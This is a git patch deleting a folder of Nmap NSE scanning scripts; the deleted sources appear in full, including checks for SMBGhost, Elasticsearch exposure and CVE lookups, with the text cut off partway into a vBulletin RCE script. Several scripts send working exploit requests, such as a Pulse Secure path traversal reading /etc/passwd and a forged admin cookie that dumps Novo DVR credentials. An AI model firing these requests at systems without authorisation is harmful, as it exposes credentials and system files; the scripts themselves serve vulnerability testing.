httpframe.nse v0.5

From 5289648a6bef3bedc88b4b73d81ddcf08f8319b7 Mon Sep 17 00:00:00 2001 From: InfoSec <1241112575@qq.com> Date: Wed, 27 Jan 2021 17:45:43 +0800 Subject: [PATCH] Delete nmap_scripts directory --- nmap_scripts/LG_Infoleak_v1.nse | 29 - nmap_scripts/LG_LFI.nse | 34 - nmap_scripts/Novo-credentials_disclosure.nse | 34 - nmap_scripts/cve-2020-0796.nse | 115 -- nmap_scripts/cve.nse | 34 - nmap_scripts/elasticsearch.nse | 67 - nmap_scripts/freevulnsearch.nse | 379 ------ nmap_scripts/http-middleware-path-finder.nse | 57 - nmap_scripts/http-pulse_ssl_vpn.nse | 82 -- nmap_scripts/http-vuln-CVE-2019-16759.nse | 88 -- nmap_scripts/http-vuln-cve2016-0870.nse | 180 --- nmap_scripts/http-vuln-cve2018-13379.nse | 129 -- nmap_scripts/http-wordpress-attachment.nse | 141 -- nmap_scripts/httpframe.nse | 115 -- nmap_scripts/infiltrator.nse | 1225 ------------------ nmap_scripts/irc-uncloak.nse | 172 --- nmap_scripts/manager.py | 81 -- nmap_scripts/philipshue-info.nse | 76 -- nmap_scripts/rdpScan.nse | 69 - nmap_scripts/struts2-scan.nse | 119 -- nmap_scripts/tomcat-cve-2017-12615.nse | 43 - nmap_scripts/trane-info.nse | 182 --- nmap_scripts/vulners.nse | 235 ---- nmap_scripts/weblogic-CNVD-C-2019-48814.nse | 88 -- nmap_scripts/weblogic-cve-2018-2894.nse | 87 -- nmap_scripts/wemo-info.nse | 144 -- nmap_scripts/wemo-switch.nse | 76 -- 27 files changed, 4081 deletions(-) delete mode 100644 nmap_scripts/LG_Infoleak_v1.nse delete mode 100644 nmap_scripts/LG_LFI.nse delete mode 100644 nmap_scripts/Novo-credentials_disclosure.nse delete mode 100644 nmap_scripts/cve-2020-0796.nse delete mode 100644 nmap_scripts/cve.nse delete mode 100644 nmap_scripts/elasticsearch.nse delete mode 100644 nmap_scripts/freevulnsearch.nse delete mode 100644 nmap_scripts/http-middleware-path-finder.nse delete mode 100644 nmap_scripts/http-pulse_ssl_vpn.nse delete mode 100644 nmap_scripts/http-vuln-CVE-2019-16759.nse delete mode 100644 nmap_scripts/http-vuln-cve2016-0870.nse delete mode 100644 nmap_scripts/http-vuln-cve2018-13379.nse delete mode 100644 nmap_scripts/http-wordpress-attachment.nse delete mode 100644 nmap_scripts/httpframe.nse delete mode 100644 nmap_scripts/infiltrator.nse delete mode 100644 nmap_scripts/irc-uncloak.nse delete mode 100644 nmap_scripts/manager.py delete mode 100644 nmap_scripts/philipshue-info.nse delete mode 100644 nmap_scripts/rdpScan.nse delete mode 100644 nmap_scripts/struts2-scan.nse delete mode 100644 nmap_scripts/tomcat-cve-2017-12615.nse delete mode 100644 nmap_scripts/trane-info.nse delete mode 100644 nmap_scripts/vulners.nse delete mode 100644 nmap_scripts/weblogic-CNVD-C-2019-48814.nse delete mode 100644 nmap_scripts/weblogic-cve-2018-2894.nse delete mode 100644 nmap_scripts/wemo-info.nse delete mode 100644 nmap_scripts/wemo-switch.nse diff --git a/nmap_scripts/LG_Infoleak_v1.nse b/nmap_scripts/LG_Infoleak_v1.nse deleted file mode 100644 index ab42fcc..0000000 --- a/nmap_scripts/LG_Infoleak_v1.nse +++ /dev/null @@ -1,29 +0,0 @@ -local http require "http" -local string require "string" -local stdnse require "stdnse" -local shortport require "shortport" - - -description = [[ -. LG DVR LE6016D -未认证远程获取用户/密码 -]] - -portrule = shortport.http - - -action = function(host, port) - local uri = "/dvr/wwwroot/user.cgi" - local output = stdnse.output_table() - local response = http.get(host, port, uri) - - if response.status == 200 then - if string.find(response.body, "") ~= nil and string.find(response.body, "") ~= nil then - output = "[+] Found vulnerable." - else - output = "[-] Not Found vulnerable." - end - end - return output -end - diff --git a/nmap_scripts/LG_LFI.nse b/nmap_scripts/LG_LFI.nse deleted file mode 100644 index 297b3bf..0000000 --- a/nmap_scripts/LG_LFI.nse +++ /dev/null @@ -1,34 +0,0 @@ -local http require "http" -local string require "string" -local stdnse require "stdnse" -local shortport require "shorport" - - -description = [[ -Desc:LG DVR LE6016D存在敏感信息泄露漏洞， -未认证用户只需要发起一个请求链接即可访问系统敏感文件， -如/etc/passwd, /etc/shadow -Tested:LG DVR LE6016D -]] - - -author = "seaung" - - -portrule = shortport.http - -action = function(host, port) - local output = stdnse.output_table() - local url = "/etc/passwd" - local response = http.get(host, port, url) - - if response.status == 200 then - if string.find(response.body, "root") ~= nil then - output = "[+] Found vulnerable." - else - output = "[-] Not Found vulnerable." - end - end - return output -end - diff --git a/nmap_scripts/Novo-credentials_disclosure.nse b/nmap_scripts/Novo-credentials_disclosure.nse deleted file mode 100644 index f56a83a..0000000 --- a/nmap_scripts/Novo-credentials_disclosure.nse +++ /dev/null @@ -1,34 +0,0 @@ -local http require "http" -local string require "string" -local stdnse require "stdnse" -local shortport require "shortport" - -description = [[ - Desc:Novo DVR存在凭证泄露问题， - 攻击者精心构造链接， - 修改cookie信息即可查看返回的登录凭证信息。 -]] - -author = "seaung" - -portrule = shortport.http - -action = function(host, port) - local url = "/device.rsp?opt=user&cmd=list" - local output = stdnse.output_table() - local options = {headers={}} - options["headers"]["cookie"] = "uid=admin" - - local response = http.get(host, port, url, options) - - if response.status == 200 then - if string.find(response.body, "admin") ~= nil and string.find(response.body, "pwd") ~= nil then - stdnse.debug1("[+] found vulnerable.") - output = "[+] Found vulnerable." - else - stdnse.debug1("[-] not found vulnerable.") - output = "[-] Not Found vulnerable." - end - end - return output -end diff --git a/nmap_scripts/cve-2020-0796.nse b/nmap_scripts/cve-2020-0796.nse deleted file mode 100644 index a7e1d36..0000000 --- a/nmap_scripts/cve-2020-0796.nse +++ /dev/null @@ -1,115 +0,0 @@ -local smb = require "smb" -local stdnse = require "stdnse" -local nmap = require "nmap" - -description = [[ -smb-protocols script modified to apply check for CVE-2020-0796 by psc4re. -Attempts to list the supported protocols and dialects of a SMB server. -NSE script to detect vulnerable CVE-2020-0796 issue, with Microsoft SMBv3 Compression (aka coronablue, SMBGhost) -The script is a modified version of smb-protocols.nse script -with a modified output data for v3.11 detection and validating CVE-2020-0796. -Note: This script just safe checks for CVE-2020-0796 vulnerability on SMBv3 and doesn't attempt anything beyond that. - -Packet check based on https://github.com/ollypwn/SMBGhost/ -The script attempts to initiate a connection using the dialects: -* NT LM 0.12 (SMBv1) -* 2.02 (SMBv2) -* 2.10 (SMBv2) -* 3.00 (SMBv3) -* 3.02 (SMBv3) -* 3.11 (SMBv3) - -Additionally if SMBv1 is found enabled, it will mark it as insecure. This -script is the successor to the (removed) smbv2-enabled script. - - -#git clonehttps://github.com/pr4jwal/CVE-2020-0796 -#cp cve-2020-0796.nse /usr/share/nmap/scripts/`` -#nmap --script-updatedb -#nmap -p445 --script cve-2020-0796 <>`` - -Checks for compression based on https://github.com/ollypwn/SMBGhost/ -Could've been done utilizing smb.lua in the nselib -but it required substantial editing of the functions, went with sockets. - -]] - ---- --- @usage nmap -p445 --script smb-protocols --- @usage nmap -p139 --script smb-protocols --- --- @output --- | smb-protocols: --- | dialects: --- | NT LM 0.12 (SMBv1) [dangerous, but default] --- | 2.02 --- | 2.10 --- | 3.00 --- | 3.02 --- |_ 3.11 (SMBv3.11) compression algorithm - Vulnerable to CVE-2020-0796 SMBGhost --- --- @xmloutput --- --- NT LM 0.12 (SMBv1) [dangerous, but default] --- 2.02 --- 2.10 --- 3.00 --- 3.02 --- 3.11 (SMBv3.11) [Potentially Vulnerable to CVE-2020-0796 Coronablue] ---

---- - -author = "Paulino Calderon (Modified by Psc4re)" -license = "Same as Nmap--See https://nmap.org/book/man-legal.html" -categories = {"safe", "discovery"} - -hostrule = function(host) - return smb.get_port(host) ~= nil -end - -action = function(host,port) - local status, supported_dialects, overrides - local output = stdnse.output_table() - overrides = {} - status, supported_dialects = smb.list_dialects(host, overrides) - if status then - for i, v in pairs(supported_dialects) do -- Mark SMBv1 as insecure - if v == "NT LM 0.12" then - supported_dialects[i] = v .. " (SMBv1) [dangerous, but default]" - end - if v == "3.11" then - local msg - local response - local compresionalg - local comp - msg = '\x00\x00\x00\xc0\xfeSMB@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00$\x00\x08\x00\x01\x00\x00\x00\x7f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00x\x00\x00\x00\x02\x00\x00\x00\x02\x02\x10\x02"\x02$\x02\x00\x03\x02\x03\x10\x03\x11\x03\x00\x00\x00\x00\x01\x00&\x00\x00\x00\x00\x00\x01\x00 \x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\n\x00\x00\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00' - local socket = nmap.new_socket() - socket:set_timeout(3000) - socket:connect(host.ip,445) - socket:send(msg) - response,data = socket:receive() - compressionalg= string.sub(data,-2) - if compressionalg == "\x01\x00" then - comp = "LZNT1 compression algorithm - Vulnerable to CVE-2020-0796 SMBGhost" - elseif compressionalg == "\x02\x00" then - comp ="LZ77 compression algorithm - Vulnerable to CVE-2020-0796 SMBGhost" - elseif compressionalg == "\x00\x00" then - comp ="No Compression Not Vulnerable" - elseif compressionalg == "\x03\x00" then - comp="LZ77+Huffman compression algorithm - Vulnerable to CVE-2020-0796 SMBGhost" - end - supported_dialects[i] = v .." " .. comp - end - end - output.dialects = supported_dialects - end - - if #output.dialects>0 then - return output - else - stdnse.debug1("No dialects were accepted") - if nmap.verbosity()>1 then - return "No dialects accepted. Something may be blocking the responses" - end - end -end diff --git a/nmap_scripts/cve.nse b/nmap_scripts/cve.nse deleted file mode 100644 index d118da6..0000000 --- a/nmap_scripts/cve.nse +++ /dev/null @@ -1,34 +0,0 @@ -description = [[ -CVE api to fetch vuln in detected service - -INSTALLATION - -$ git clone https://github.com/arpitrohela/nmap_nse.git -$ cd nmap_nse/ -$ sudo cp cve.nse /usr/share/nmap/scripts/ -$ sudo nmap --script cve.nse 192.168.0.1 -p 80 -sV -]] -author = "Arpit Rohela" -license = "Same as Nmap--See http://nmap.org/book/man-legal.html" -categories = {"vuln"} - -local http = require "http" - --- The Rule Section -- -portrule = function(host, port) - return port.state == "open" -end - --- The Action Section -- -action = function(host, port) - - local uri = "/api/search/httpd" - local response = http.get("cve.circl.lu", port, uri) - - if ( response.status == 200 ) then - return response.body --- and port.version.product-- --- and type(port.version.version)-- - end - -end diff --git a/nmap_scripts/elasticsearch.nse b/nmap_scripts/elasticsearch.nse deleted file mode 100644 index 51c7296..0000000 --- a/nmap_scripts/elasticsearch.nse +++ /dev/null @@ -1,67 +0,0 @@ -description = [[ -Attempts to enumerate indices, plugins and cluster nodes on a target elasticsearch -exposing an unauthenticated HTTP port (default 9200/tcp) using the elasticsearch RESTful API. -Installation -$ git clone https://github.com/theMiddleBlue/nmap-elasticsearch-nse.git -$ cp nmap-elasticsearch-nse/elasticsearch.nse /usr/share/nmap/scripts/ -$ nmap --script=elasticsearch - -]] - -author = "theMiddle" - -license = "Same as Nmap--See https://nmap.org/book/man-legal.html" - -categories = {"discovery", "version"} - -local http = require "http" -local string = require "string" -local json = require "json" - -portrule = function(host, port) - return port.protocol == "tcp" and port.state == "open" -end - -action = function(host, port) - local uri = "/" - local response = http.get(host, port, uri) - if ( response.status == 200 ) then - if ( string.find(response.body, "You Know, for Search") ) then - local out = "by theMiddle (Twitter: @Menin_TheMiddle)\r\n\r\n" - out = out .. "found RESTful API\r\n" - err, esjson = json.parse(response.body) - - out = out .. "version: ".. esjson['version']['number'] .."\r\n" - - if esjson['cluster_name'] then - out = out .. "cluster name: " .. esjson['cluster_name'] .. "\r\n" - end - - out = out .. "\r\nIndices found in /_cat/indices:\r\n" - local resindices = http.get_url("http://"..host.ip..":"..port.number.."/_cat/indices?pri&v&h=health,index,docs.count") - out = out .. resindices.body - - out = out .. "\r\nPlugins found in /_cat/plugins:\r\n" - local resplugins = http.get_url("http://"..host.ip..":"..port.number.."/_cat/plugins") - out = out .. resplugins.body - - out = out .. "\r\nNodes found in /_cat/nodes:\r\n" - local resnodes = http.get_url("http://"..host.ip..":"..port.number.."/_cat/nodes") - out = out .. resnodes.body - - out = out .. "\r\nNodes process:\r\n" - local resprocess = http.get_url("http://"..host.ip..":"..port.number.."/_nodes/_all/process") - err, psjson = json.parse(resprocess.body) - - for key,value in pairs(psjson['nodes']) do - out = out .. " - Name: " .. value['name'] .. "\r\n" - out = out .. " - Transport Address: " .. value['transport_address'] .. "\r\n" - out = out .. " - Host: " .. value['host'] .. "\r\n" - out = out .. " - IP: " .. value['ip'] .. "\r\n" - out = out .. " - Version: " .. value['version'] .. "\r\n\r\n" - end - - return out - end - end -end diff --git a/nmap_scripts/freevulnsearch.nse b/nmap_scripts/freevulnsearch.nse deleted file mode 100644 index e8bcc93..0000000 --- a/nmap_scripts/freevulnsearch.nse +++ /dev/null @@ -1,379 +0,0 @@ --- Head --- Required NSE libraries - -local stdnse = require "stdnse" -local string = require "string" -local table = require "table" -local http = require "http" -local json = require "json" - --- Input Arguments - -local apipath = stdnse.get_script_args("freevulnsearch.apipath") -local notls = stdnse.get_script_args("freevulnsearch.notls") -local summary = stdnse.get_script_args("freevulnsearch.summary") -local xmlhtml = stdnse.get_script_args("freevulnsearch.xmlhtml") - -description = [[ - -project ：https://github.com/OCSAF/freevulnsearch -This script [Version 1.1.8] allows you to automatically search for CVEs using the API of -https://www.circl.lu/services/cve-search/ in connection with the found CPEs -using the parameter -sV in NMAP. - -This script is part of the FreeOCSAF Project - https://freecybersecurity.org. -Use only with legal authorization and at your own risk! ANY LIABILITY WILL BE REJECTED! - -Thanks to cve-search.org and circl.lu for the ingenious api -and special thanks to the community for many useful ideas that speed up my coding! - -Realized functions: -Version 1.0 - Contains the basic functions to quickly find relevant CVEs. -Version 1.0.1 - Includes EDB and MSF in output and minor changes. -Version 1.0.2 - Special CPE formatting and output optimization. -Version 1.0.3 - Small adjustments -Version 1.1 - Support your own cve-search api-link - https:///api/cvefor/ -Version 1.1.1 - Adaptation to CVSS rating instead of OSSTMM - Input from the community, thanks -Version 1.1.2 - Special CPE formatting - Many thanks to Tore (cr33y) for testing. -Version 1.1.3b - Special CPE formatting - Many thanks to Tore (cr33y) for testing. -Version 1.1.4 - Optimization for OCSAF freevulnaudit.sh project. -Version 1.1.5 - Assignment to external category only -Version 1.1.6 - Adaptation API to http and tls as option -Version 1.1.6a - Adaptation API to tls and http as option -Version 1.1.7 - Optimized for nmap 7.80 -Version 1.1.8 - Optimized for cve-search api - -Future functions: -Version 1.2 - Shall contains optional sort by severity (CVSS) -Version 1.3 - Implementation of your useful ideas. - -Usage: -nmap -sV --script freevulnsearch - -Output explanation: -CVE-Number Rating CVSS EDB MSF CVE-Link - -CVE-Number: -Common Vulnerabilities and Exposures - -CVSS v3.0 Ratings: -Critical (CVSS 9.0 - 10.0) -High (CVSS 7.0 - 8.9) -Medium (CVSS 4.0 - 6.9) -Low (CVSS 0.1 - 3.9) -None (CVSS 0.0) - -CVSS: -Common Vulnerability Scoring System with with the level of severty from 0.0 - 10.0 - -EDB: -There is an exploit in the Exploit-DB.com - -MSF: -There is a module in the Metasploit Framework - -CVE-Link: -Additional information on the vulnerability found. - -]] - -author = "Mathias Gut" - -license = "Same as Nmap--See https://nmap.org/book/man-legal.html" - -categories = {"safe", "vuln", "external"} - --- @usage --- nmap -sV --script freevulnsearch [--script-args apipath=] --- nmap -sV --script freevulnsearch [--script-args notls=yes] --- nmap -sV --script freevulnsearch [--script-args summary=yes] --- nmap -sV --script freevulnsearch [--script-args xmlhmtl=yes] --- --- @output --- --- 22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0) --- | freevulnsearch: --- | CVE-2018-15473 Medium 5.0 EDB MSF https://cve.circl.lu/cve/CVE-2018-15473 --- | CVE-2017-15906 Medium 5.0 https://cve.circl.lu/cve/CVE-2017-15906 --- | CVE-2016-10708 Medium 5.0 https://cve.circl.lu/cve/CVE-2016-10708 --- | CVE-2010-4755 Medium 4.0 https://cve.circl.lu/cve/CVE-2010-4755 --- | CVE-2010-4478 High 7.5 https://cve.circl.lu/cve/CVE-2010-4478 --- | CVE-2008-5161 Low 2.6 https://cve.circl.lu/cve/CVE-2008-5161 --- |_ *CVE found with NMAP-CPE: (cpe:/a:openbsd:openssh:4.7p1) --- - --- Portrule - --- The table port.version contains the CPEs - -portrule = function(host, port) - local portv=port.version - return portv ~= nil and portv.version ~= nil -end - --- Function to check if a version number exists at the CPE -function func_check_cpe(cpe) - - _, count = string.gsub(cpe, ":", " ") - if count >= 4 then - return cpe - else - return 0 - end -end - --- Function to check for special CPE formatting. -function func_check_cpe_form(cpe) - - local cpe_form - local sub_form1 - local sub_form2 - local sub_form3 - local cpe_front - local cpe_version - - _, count1 = string.gsub(cpe, ":httpfileserver:", " ") - _, count2 = string.gsub(cpe, ".*:.*:.*:.*:.*-", " ") - _, count3 = string.gsub(cpe, ".*:.*:.*:.*:.*_", " ") - _, count4 = string.gsub(cpe, ".*:.*:.*:.*:.*%..*%.%d%a%d", " ") - _, count5 = string.gsub(cpe, ".*:.*:.*:.*:.*%a%d", " ") - _, count6 = string.gsub(cpe, ".*:.*:.*:.*:.*%d%a", " ") - - if count1 ~= 0 then - cpe_form = string.gsub(cpe,"httpfileserver","http_file_server") - return cpe_form - elseif count2 ~= 0 then -- (MySQL) 5.0.51a-3ubuntu5 -to- 5.0.51a - sub_form1 = string.gsub(cpe,".*:",":") - cpe_version = string.gsub(sub_form1,"-.*","") - cpe_front = string.gsub(cpe,cpe_version .. ".*","") - cpe_form = cpe_front .. cpe_version - return cpe_form - elseif count3 ~= 0 then -- (Exim smtpd) 4.90_1 -to- 4.90 - sub_form1 = string.gsub(cpe,".*:",":") - cpe_version = string.gsub(sub_form1,"_.*","") - cpe_front = string.gsub(cpe,cpe_version .. ".*","") - cpe_form = cpe_front .. cpe_version - return cpe_form - elseif count4 ~= 0 then -- (OpenSSH) 6.6.1p1 -to- 6.6:p1 - sub_form1 = string.gsub(cpe,".*:",":") - sub_form2 = string.gsub(sub_form1,"%.%d%a%d.*","") - sub_form3 = string.gsub(sub_form1,".*%.%d","") - cpe_version = sub_form2 .. ":" .. sub_form3 - cpe_front = string.gsub(cpe,sub_form1,"") - cpe_form = cpe_front .. cpe_version - return cpe_form - elseif count5 ~= 0 then -- (OpenSSH) 7.5p1 -to- 7.5:p1 - sub_form1 = string.gsub(cpe,".*:",":") - sub_form2 = string.gsub(sub_form1,"%a.*","") - sub_form3 = string.gsub(sub_form1,sub_form2,"") - cpe_version = sub_form2 .. ":" .. sub_form3 - cpe_front = string.gsub(cpe,sub_form1,"") - cpe_form = cpe_front .. cpe_version - return cpe_form - elseif count6 ~= 0 then -- (ProFTPD) 1.3.5a -to- 1.3.5 - sub_form1 = string.gsub(cpe,".*:",":") - sub_form2 = string.gsub(sub_form1,"%d.*","") - cpe_version = string.gsub(sub_form1,sub_form2,"") - cpe_front = string.gsub(cpe,sub_form1,"") - cpe_form = cpe_front .. cpe_version - return cpe_form - else - return 0 - end -end - --- Function to check for known vulnerabilities without CVE -function func_check_known_vuln(cpe) - - local cpe_vuln - - if cpe == "cpe:/a:vsftpd:vsftpd:2.3.4" then - cpe_vuln = "EDB-ID-17491\t" .. "Critical\t" .. "None\t" .. "EDB MSF\t" .. "https://www.exploit-db.com/exploits/17491" - return cpe_vuln - else - return 0 - end -end - --- Function to query CVEs via CPEs with API (circl.lu). -function func_check_cve(cpe) - - local url - local option = { - max_body_size=40000000, - timeout=40000 - } - local response - local request - local status - local vulnerabilities - - if not apipath then - if not notls then - url = "https://cve.circl.lu/api/cvefor/" - else - url = "http://cve.circl.lu/api/cvefor/" - end - else - url = apipath - end - - request = url .. cpe - - response = http.get_url(request, option) - - status, vulnerabilities = json.parse(response.body) - - if status ~= true then - return 1 - elseif type(next(vulnerabilities)) == "nil" then - return 2 - elseif (status == true and vulnerabilities ~= "") then - return func_output(vulnerabilities) - else - return 2 - end -end - --- Function to generate the script output. -function func_output(vulnerabilities) - - local output_table = {} - local input_table = {} - local cve_url= "https://cve.circl.lu/cve/" - local cve_value - local cvss - local cvss_value - local cvss_rating - local url_value - local edb - local msf - local exploit - local sum - local cwe - local xmlhtml_out - local i - local t - - if not xmlhtml then - xmlhtml_out = "" - else - xmlhtml_out = " " - end - - for i,t in ipairs(vulnerabilities) do - cve_value = t.id - cvss = tonumber(t.cvss) - url_value = cve_url .. t.id - if t.refmap then - edb = t.refmap["exploit-db"] - msf = t.refmap.metasploit - end - - if not cvss then - cvss_value = "None" - cvss_rating = "None" - else - cvss_value = cvss - cvss_rating = func_rating(cvss) - end - - if not edb and not msf then - exploit = "" - elseif edb and not msf then - exploit = "EDB" - elseif not edb and msf then - exploit = "MSF" - elseif edb and msf then - exploit = "EDB MSF" - end - - if not summary then - output_table = cve_value .. xmlhtml_out .. "\t" .. cvss_rating .. "\t" .. cvss_value .. "\t" .. exploit .. "\t" .. url_value - else - sum = t.summary - - if not t.cwe then - output_table = cve_value .. xmlhtml_out .. "\t" .. cvss_rating .. "\t" .. cvss_value .. "\t" .. exploit .. "\t" .. url_value .. - "\n *SUMMARY: " .. sum .. "\n" - else - cwe = t.cwe - output_table = cve_value .. xmlhtml_out .. "\t" .. cvss_rating .. "\t" .. cvss_value .. "\t" .. exploit .. "\t" .. url_value .. - "\n *CWE: " .. cwe .. - "\n *SUMMARY: " .. sum .. "\n" - end - end - - input_table[i] = output_table - end - - return input_table -end - --- Function to assign CVSS values to CVSS V3.0 ratings -function func_rating(cvss) - - if (cvss == 0.0) then - return "None\t" - elseif (3.9 >= cvss and cvss >= 0.1) then - return "Low\t" - elseif (6.9 >= cvss and cvss >= 4.0) then - return "Medium\t" - elseif (8.9 >= cvss and cvss >= 7.0) then - return "High\t" - elseif (10.0 >= cvss and cvss >= 9.0) then - return "Critical" - end -end - - --- Action --- Main-Function -action = function(host, port) - - local cpe="" - local check - local sort_values - local form_cpe - local known_vuln - local i - - for i, cpe in ipairs(port.version.cpe) do - check = func_check_cpe(cpe) - if check ~= 0 then - sort_values = func_check_cve(check) - if sort_values == 1 then - return "*Error with API query. API or network possibly not available." - elseif sort_values == 2 then - form_cpe = func_check_cpe_form(check) - if form_cpe == 0 then - known_vuln = func_check_known_vuln(check) - if known_vuln == 0 then - return "\n *No CVE found with NMAP-CPE: (" .. check .. ")" .. - "\n *Check other sources like https://www.exploit-db.com" - else - return "\n " .. known_vuln .. "\n *No CVE found with CPE: (" .. check .. ")" - end - else - sort_values = func_check_cve(form_cpe) - if sort_values == 2 then - return "\n *No CVE found with NMAP-CPE: (" .. check .. ")" .. - "\n *No CVE found with freevulnsearch function: (" .. form_cpe .. ")" .. - "\n *Check other sources like https://www.exploit-db.com" - else - table.sort(sort_values, function(a, b) return a>b end) - table.insert(sort_values, "*No CVE found with NMAP-CPE: (" ..check .. ")") - table.insert(sort_values, "*CVE found with freevulnsearch function: (" .. form_cpe .. ")") - return sort_values - end - end - else - table.sort(sort_values, function(a, b) return a>b end) - table.insert(sort_values, "*CVE found with NMAP-CPE: (" ..check .. ")") - return sort_values - end - elseif check == 0 then - return "\n *Check unspecific version manually: (".. cpe .. ")" - end - end -end diff --git a/nmap_scripts/http-middleware-path-finder.nse b/nmap_scripts/http-middleware-path-finder.nse deleted file mode 100644 index fb67cab..0000000 --- a/nmap_scripts/http-middleware-path-finder.nse +++ /dev/null @@ -1,57 +0,0 @@ -local http = require "http" -local shortport = require "shortport" -local string = require "string" -local stdnse = require "stdnse" - - -description = [[ - A middleware sensitive directory scan script -$ git clone https://github.com/Rvn0xsy/nse_vuln.git -$ cd /nse_vuln/ -$ sudo cp * /usr/share/nmap/scripts/ -$ sudo nmap -n -p 443 --script http-middleware-path-finder.nse victim_host -]] - -author = "Rvn0xsy@gmail.com" -license = "Same as Nmap--See https://nmap.org/book/man-legal.html" -categories = {"default"} -blog = "https://payloads.online" --- Precision mode --- portrule = shortport.port_or_service( {80, 443, 8080, 7001}, {"http", "https"}, "tcp", "open") - -portrule = shortport.service({"http","https"},"tcp","open") - -action = function(host, port) - out = stdnse.output_table() - local status, result , body = http.identify_404(host,port) - local all = nil - request_paths = { - "/phpinfo.php", - "/manager/html", - "/_async/AsyncResponseService", - "/console/login/LoginForm.jsp", - "/phpmyadmin/", - "/web-console", - "/jmx-console", - "/host-manager", - "/status", - "/logs/access_log", - "/jonasAdmin/", - "/ibm/console/logon.jsp" -} - - for key,value in ipairs(request_paths) - do - all = http.pipeline_add(value,nil,all,'GET') - end - - local results = http.pipeline_go(host, port, all) - - for num,res in ipairs(results)do - if(res.status ~= result)then - out[num] = request_paths[num] - end - end - - return out -end \ No newline at end of file diff --git a/nmap_scripts/http-pulse_ssl_vpn.nse b/nmap_scripts/http-pulse_ssl_vpn.nse deleted file mode 100644 index af1695f..0000000 --- a/nmap_scripts/http-pulse_ssl_vpn.nse +++ /dev/null @@ -1,82 +0,0 @@ -description = [[ -Pulse Secure SSL VPN file disclosure via specially crafted HTTP resource requests. -This exploit reads /etc/passwd as a proof of concept -This vulnerability affect ( 8.1R15.1, 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4) - -INSTALLATION -$ git clone https://github.com/r00tpgp/http-pulse_ssl_vpn.nse.git -$ cd http-pulse_ssl_vpn.nse/ -$ sudo cp http-pulse_ssl_vpn.nse /usr/share/nmap/scripts/ -$ sudo nmap -n -p 443 --script http-pulse_ssl_vpn -n victim_host -]] - -local http = require "http" -local shortport = require "shortport" -local vulns = require "vulns" -local stdnse = require "stdnse" -local string = require "string" - ---- --- @usage --- nmap -p --script pulse_ssl_vpn --- --- @output --- PORT STATE SERVICE --- s4430/tcp open http --- | http-vuln-cve2019-11510: --- | VULNERABLE --- | Pulse Secure SSL VPN file disclosure via specially crafted HTTP resource requests --- | State: VULNERABLE --- | IDs: CVE:CVE-2019-11510 --- | --- | Disclosure date: 2019-04-24 --- | References: --- | http://www.securityfocus.com/bid/108073 --- | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11510 --- |_ http://packetstormsecurity.com/files/154176/Pulse-Secure-SSL-VPN-8.1R15.1-8.2-8.3-9.0-Arbitrary-File-Disclosure.html --- --- @args http-vuln-cve2019-11510.method The HTTP method for the request. The default method is "GET". --- @args http-vuln-cve2019-11510.path The URL path to request. The default path is "/". - -author = "r00tpgp" -license = "Same as Nmap--See https://nmap.org/book/man-legal.html" -categories = { "vuln" } - -portrule = shortport.http - -action = function(host, port) - local vuln = { - title = "Pulse Secure SSL VPN file disclosure via specially crafted HTTP resource requests", - state = vulns.STATE.NOT_VULN, - description = [[ -Pulse Secure SSL VPN file disclosure via specially crafted HTTP resource requests. -This exploit reads /etc/passwd as a proof of concept -This vulnerability affect ( 8.1R15.1, 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4 - ]], - IDS = { - CVE = "CVE-2019-11510" - }, - references = { - 'http://www.securityfocus.com/bid/108073', - 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11510', - 'http://packetstormsecurity.com/files/154176/Pulse-Secure-SSL-VPN-8.1R15.1-8.2-8.3-9.0-Arbitrary-File-Disclosure.html' - }, - dates = { - disclosure = { year = '2019', month = '04', day = '24' } - } - } - - -- Send a simple GET request to the server, if it returns appropiate string, then you have a vuln host - options = {header={}} options['header']['User-Agent'] = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" - --local req = http.get(host, port, uri, options) - local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port) - local url = stdnse.get_script_args(SCRIPT_NAME..".url") or "/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/" - local response = http.generic_request(host, port, "GET", "/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/", options) - - if response.status == 200 and string.match(response.body, "root:x:0:0:root:/:/bin/bash") then - -- if response.status == 200 then - vuln.state = vulns.STATE.VULN - end - - return vuln_report:make_output(vuln) -end diff --git a/nmap_scripts/http-vuln-CVE-2019-16759.nse b/nmap_scripts/http-vuln-CVE-2019-16759.nse deleted file mode 100644 index 22ed8a4..0000000 --- a/nmap_scripts/http-vuln-CVE-2019-16759.nse +++ /dev/null @@ -1,88 +0,0 @@ -description = [[ -vBulletin 5.x 0day pre-auth RCE exploit -This should work on all versions from 5.0.0 till 5.5.4 -INSTALLATION -$ git clone https://github.com/r00tpgp/http-vuln-CVE-2019-16759 -$ cd http-vuln-CVE-2019-16759/ -$ sudo cp http-vuln-CVE-2019-16759.nse /usr/share/nmap/scripts/ -$ sudo nmap --script http-vuln-CVE-2019-16759 -p 80 -sSV -]] - -local http = require "http" -local shortport = require "shortport" -local vulns = require "vulns" -local stdnse = require "stdnse" -local string = require "string" - ---- --- @usage --- nmap -p --script http-vuln-CVE-2019-16759 --- --- @output --- PORT STATE SERVICE --- s4430/tcp open http --- | http-vuln-CVE-2019-16759: --- | VULNERABLE --- | vBulletin 5.x 0day pre-auth RCE exploit --- | State: VULNERABLE --- | IDs: CVE:CVE-2019-16759 --- | --- | 